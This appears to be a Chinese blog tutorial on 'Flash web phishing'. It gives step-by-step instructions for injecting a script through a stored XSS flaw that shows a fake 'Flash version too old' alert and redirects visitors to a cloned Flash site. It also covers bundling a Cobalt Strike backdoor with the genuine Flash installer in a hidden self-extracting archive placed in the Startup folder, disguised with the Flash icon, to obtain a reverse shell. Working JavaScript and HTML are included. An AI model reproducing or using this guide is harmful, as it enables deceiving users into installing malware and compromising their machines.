钓鱼攻击之:Flash 网页钓鱼

1 准备资料

  1. Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼
  2. 生成后门并捆绑flash的安装程序
  3. VPS服务器,并使用步骤1的资源,搭建好flash网站,下载地址要修改为构造好的后门文件。
  4. 有XSS漏洞的网站:GitHub - r00tSe7en/Flash-Pop: Flash钓鱼弹窗优化版

2 具体钓鱼流程

  1. 找到可以插入一段JS代码的网站,如:存在存储xss漏洞。插入触发flash版本过低弹窗的JS代码:

    <script src='http://192.168.10.3/version.js'></script>
  2. 目标点击确定后,跳转到伪造flash界面的VPS服务器,

  3. 目标靶机点击下载并安装,触发后门反弹shell

3 生成后门并捆绑flash的安装程序

  1. 通过CS生成C格式的shellcode,利用下面的网站生成后门程序

  2. 安装Winrar。

  3. 同时选中后门与Flash官方安装包,右键选择:添加到压缩文件。

  4. 选择:创建自解压格式压缩文件-->修改:压缩文件名(使其看起来更可信)

  5. 选择:高级-->自解压选项-->更新-->更新模式:解压并更新文件-->覆盖模式:覆盖所有文件

  6. 高级自解压选项窗口中选择:常规-->解压路径放到windows开机自启动目录

    C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup

  7. 高级自解压选项窗口中选择:设置-->解压后运行:r9VTngXsPg.exe-->解压前运行:flashplayerpp_install_cn.exe

  8. 高级自解压选项窗口中选择:模式-->全部隐藏

  9. 生成文件

  10. 为了增加可信度,修改生成后的文件图标

    1. 使用 ResourceHacker 导出flash官方文件的图标组

    2. 再用 ResourceHacker 将生成的自解压文件图标组修改成刚刚导出的flash图标组

    3. 另存为exe文件,再次确保命名为官网相同文件名

  11. 上传到VPS服务器中

4 处理WEB站点过程

  1. 模拟伪造Flash网站的VPS服务器:kali下

    1. 将下载的xss_flash目录中的文件全部移到/var/www/html

    2. 修改下载软件的地址为前面构造的后门软件

    3. 修改version.js中弹窗的指向伪造Flash网站地址

      window.alert = function(name){
      var iframe = document. createElement("IFRAME");
      iframe.style.display="none";
      iframe.setAttribute("src",'data:text/plain,');
      document. documentElement.appendChild(iframe);
      window.frames [0].window.alert(name);
      iframe.parentNode.removeChild(iframe);
      }
      alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
      window. location.href="http://192.168.10.3";
      • 此处伪造Flash网站地址为:http://192.168.10.3
    4. 启动apache2服务

  2. 模拟存在XSS网站的VPS服务器:index.html

    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8">
    <title>Flash Test...</title>
    <script src='http://192.168.10.3/version.js'></script>
    </head>
    <body>
    <h1>Flash Test...</h1>
    </body>
    </html>
    • 模拟插入了<script src='http://192.168.10.3/version.js'></script>脚本
    • 此处存在XSS网站的VPS服务器地址为:http://192.168.10.3:81
  3. 目标靶机访问到这个存在XSS的页面就会执行代码

  4. 点确定后,跳转到伪造Flash网站

  5. 目标靶机点击下载并运行exe后,成功上线

钓鱼攻击之:Flash 网页钓鱼的更多相关文章

  1. DNS欺骗:网站克隆实现网站钓鱼攻击

    1 DNS 1.1 DNS是什么? 域名系统(Domain Name System)是互联网使用的命名系统,用来将主机域名转换为 ip 地址,属于应用层协议,使用 UDP 传输. 1.2 为什么需要D ...

  2. 支付SDK的安全问题——隐式意图可导致钓鱼攻击

     该漏洞涉及到app所使用的intent和intent filter. intent是一个可用于从一个app组件请求动作或处理事件的“消息对象”.Intent负责对应用中一次操作的动作.动作涉及数据. ...

  3. pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))

    XSS-漏洞测试案例 xss案例 1.cookie的窃取和利用 2.钓鱼攻击 3.XSS获取键盘记录 在进行案例之前首先要搭建xss后台 搭建xss后台 1.在pikachu文件夹下面,把pkxss单 ...

  4. CobaltStrike 生成office宏病毒进行钓鱼攻击

    关于WORD宏: 在百度百科上有: 宏是一个批量处理程序命令,正确地运用它可以提高工作效率.微软的office软件允许用户自己编写,叫VBA的脚本来增加其灵活性,进一步扩充它的能力.如完打开word文 ...

  5. 风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

    风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击 XSS钓鱼攻击 HTTP Basic Authentication认证 大家在登录网站的时候,大部分时候是通过一个表单提交登录信息. 但是有时候 ...

  6. 钓鱼攻击之远程加载恶意Word模版文件上线CS

    0x00 前言 利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器请求恶意模板并执行恶意模板上的恶意代码.这里 ...

  7. kali下利用weeman进行网页钓鱼

    工具下载链接:https://files.cnblogs.com/files/wh4am1/weeman-master.zip 利用wget命令下载zip压缩包 利用unzip命令解压 接着直接cd进 ...

  8. 推荐美丽的flash网页MP3音乐播放器

    文章来源:PHP开发学习门户 地址:http://www.phpthinking.com/archives/491 在网页制作中.假设想在网页中插入mp3音乐来增添网页的互动感,提升用户体验度,这个时 ...

  9. Selenium+Java - 结合sikuliX操作Flash网页

    前言 前天被一个Flash的轮播图,给玩坏了,无法操作,后来请教了下crazy总拿到思路,今天实践了下,果然可以了,非常感谢! 模拟场景 打开百度地图 切换城市到北京 使用测距工具 测量 奥林匹克森林 ...

  10. 使用Wifi pineapple(菠萝派)进行Wi-Fi钓鱼攻击

    简介: WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器. 特性: 用作 Wi-Fi 中间人攻击测试平台 一整套的针对 AP 的渗透测试套件 基于 WEB ...

随机推荐

  1. Java语言进阶 day02【Collection、泛型】

    主要内容 Collection集合 迭代器 增强for 泛型 教学目标

  2. JavaEE Day14 Servlet&HTTP&Request

    今日内容 1.Servlet 2.HTTP协议 3.Request 一.Servlet 1.概念 2.步骤 3.执行原理 4.生命周期 5.Servlet 3.0注解配置 6.Servlet体系结构 ...

  3. L1-064 估值一亿的AI核心代码 (20分)

    L1-064 估值一亿的AI核心代码 (20分) 以上图片来自新浪微博. 本题要求你实现一个稍微更值钱一点的 AI 英文问答程序,规则是: 无论用户说什么,首先把对方说的话在一行中原样打印出来: 消除 ...

  4. O-MVLL:支持ARM64的基于LLVM的代码混淆模块

    O-MVLL介绍 O-MVLL的开发灵感来自于另一个著名的基于LLVM的代码混淆项目ollvm,并在其基础上做了创新和改进.O-MVLL的混淆逻辑实现方式也是通过LLVM Pass,支持也仅会支持AR ...

  5. django中如何开启事务

    一:django中如何开启事务 1.事务的四大特征 ACID A: 原子性 每个事务都是不可分割的最小单位(同一个事物内的多个操作要么同时成功要么同时失败) C: 一致性 事物必须是使数据库从一个一致 ...

  6. python中使用pip 安装第三方库报错归类及解决方式

    1.  离线安装virtualenv报错,安装命令:python setup.py install 解决方式:升级setuptools 2.  安装第三方库时安装失败,安装命令:pip install ...

  7. js将时间戳转成时间格式

    let start_time = 1653007401082, date = new Date(+start_time), Y = date.getFullYear() + '-', M = (dat ...

  8. 跳石头(NOIP2015)

    AcWing 洛谷 解题思路 这题看到最短跳跃距离尽可能长就会想到二分 但是我们二分的\(check\)函数怎么写呢 可以看到限制条件移走的石头最多只能是\(m\)块 我们二分这个最短距离 容易想到一 ...

  9. 基于Hexo搭建静态博客

    关于静态博客 通常来讲,建立个人博客有2种方式: 第一,直接在第三方博客平台注册博客空间,如:博客园,简书,CSDN等,这种方式建立的博客,所有数据都存放在博客平台. 第二,自建博客系统,这种方式就是 ...

  10. MySql索引下推知识分享

    作者:刘邓忠 Mysql 是大家最常用的数据库,下面为大家带来 mysql 索引下推知识点的分享,以便巩固 mysql 基础知识,如有错误,还请各位大佬们指正. 1 什么是索引下推 索引下推 (Ind ...